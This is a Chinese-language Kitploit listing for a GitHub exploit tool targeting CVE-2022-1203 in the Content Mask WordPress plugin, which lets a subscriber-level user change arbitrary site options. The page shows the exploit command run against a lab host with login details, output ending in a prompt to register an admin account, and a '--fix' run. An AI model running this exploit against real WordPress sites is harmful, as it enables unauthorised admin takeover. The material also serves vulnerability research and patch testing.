Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-1203 — Content Mask < 1.8.4 - 订阅者及以上权限的任意选项更新 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2022-1203
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证错误配置
GitHubrandomrobbiebf/cve-2022-1203

CVE-2022-1203

Content Mask < 1.8.4 - 订阅者及以上权限的任意选项更新

查看仓库
23年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-1203

Content Mask < 1.8.4 - 订阅者+ 任意选项更新

描述

Content Mask WordPress 插件在 1.8.4.1 之前的版本中,多个 AJAX 操作缺少授权和 CSRF 检查,同时也没有验证要更新的选项以确保其属于该插件。因此,任何已认证用户(例如订阅者)都可以修改任意博客选项。

使用方法

漏洞利用

root@kitploit:~
$ python3 CVE-2022-1203.py -u http://wordpress.lan -un user -p useruser1
The plugin version is below 1.8.3.2.
The plugin version is 1.8.3.2
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.

修复

root@kitploit:~
python3 CVE-2022-1203.py -u http://wordpress.lan -un user -p useruser1 --fix yes
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Fixed: You can not longer register

下载工具